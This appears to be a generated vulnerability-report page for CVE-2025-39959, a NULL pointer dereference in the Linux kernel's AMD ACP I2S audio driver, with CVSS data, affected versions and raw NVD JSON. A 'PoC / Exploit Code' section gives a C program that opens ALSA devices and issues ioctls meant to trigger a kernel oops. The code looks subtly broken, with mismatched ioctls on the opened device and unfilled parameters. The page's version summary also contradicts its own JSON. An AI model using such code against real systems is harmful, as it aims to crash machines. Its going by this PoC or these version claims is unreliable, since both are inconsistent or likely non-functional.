Security Vulnerability Report
CVE-2025-39959 CVSS 5.5 MEDIUM

CVE-2025-39959

Published: 2025-10-09 10:15:39
Last Modified: 2026-02-26 22:52:08
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ASoC: amd: acp: Fix incorrect retrival of acp_chip_info

Use dev_get_drvdata(dev->parent) instead of dev_get_platdata(dev) to correctly obtain acp_chip_info members in the acp I2S driver. Previously, some members were not updated properly due to incorrect data access, which could potentially lead to null pointer dereferences.

This issue was missed in the earlier commit ("ASoC: amd: acp: Fix NULL pointer deref in acp_i2s_set_tdm_slot"), which only addressed set_tdm_slot(). This change ensures that all relevant functions correctly retrieve acp_chip_info, preventing further null pointer dereference issues.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:* - VULNERABLE
Linux kernel < 6.17 (affected versions; the exact range depends on the distribution)
All Linux kernel versions that include the ASoC AMD ACP driver (before the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2025-39959 PoC - Trigger NULL pointer dereference in ASoC AMD ACP I2S driver
 * This PoC demonstrates how to trigger the vulnerability by accessing the AMD ACP
 * audio device and triggering I2S operations that access acp_chip_info incorrectly.
 *
 * Note: Requires local access on a system with AMD ACP audio hardware.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sound/asound.h>

int main(int argc, char *argv[])
{
    int fd;
    int ret;

    /* Open the AMD ACP I2S playback device */
    fd = open("/dev/snd/pcmC0D0p", O_WRONLY);
    if (fd < 0) {
        perror("Failed to open PCM playback device");
        /* Try other card/device combinations */
        fd = open("/dev/snd/controlC0", O_RDWR);
        if (fd < 0) {
            fprintf(stderr, "No AMD ACP audio device found\n");
            return 1;
        }
    }

    printf("Opened AMD ACP audio device, triggering I2S operations...\n");

    /* Trigger TDM slot configuration which accesses acp_chip_info */
    /* This path was partially fixed but other functions still have the bug */
    struct snd_ctl_tlv *tlv;
    unsigned char buf[256];

    /* Attempt to access audio controls that trigger acp_chip_info access */
    ret = ioctl(fd, SNDRV_CTL_IOCTL_TLV_READ, buf);
    if (ret < 0) {
        perror("ioctl failed (expected on vulnerable kernel)");
    }

    /* Try to set audio parameters that trigger the vulnerable code path */
    struct snd_pcm_hw_params *params;
    params = calloc(1, sizeof(struct snd_pcm_hw_params));
    if (params) {
        /* Setting HW params triggers acp_i2s_hw_params which accesses chip_info */
        ret = ioctl(fd, SNDRV_PCM_IOCTL_HW_PARAMS, params);
        free(params);
    }

    close(fd);
    printf("Operation completed. Check dmesg for kernel oops if vulnerable.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39959", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-09T10:15:38.507", "lastModified": "2026-02-26T22:52:07.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: amd: acp: Fix incorrect retrival of acp_chip_info\n\nUse dev_get_drvdata(dev->parent) instead of dev_get_platdata(dev)\nto correctly obtain acp_chip_info members in the acp I2S driver.\nPreviously, some members were not updated properly due to incorrect\ndata access, which could potentially lead to null pointer\ndereferences.\n\nThis issue was missed in the earlier commit\n(\"ASoC: amd: acp: Fix NULL pointer deref in acp_i2s_set_tdm_slot\"),\nwhich only addressed set_tdm_slot(). This change ensures that all\nrelevant functions correctly retrieve acp_chip_info, preventing\nfurther null pointer dereference issues."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.16.9", "matchCriteriaId": "8222621E-C594-44E8-995D-65FF1817EDA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": 
"327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/65c5cfbd6d938f77a0df3c34855a4f7d8a61fd10", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d7871f400cad1da376f1d7724209a1c49226c456", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}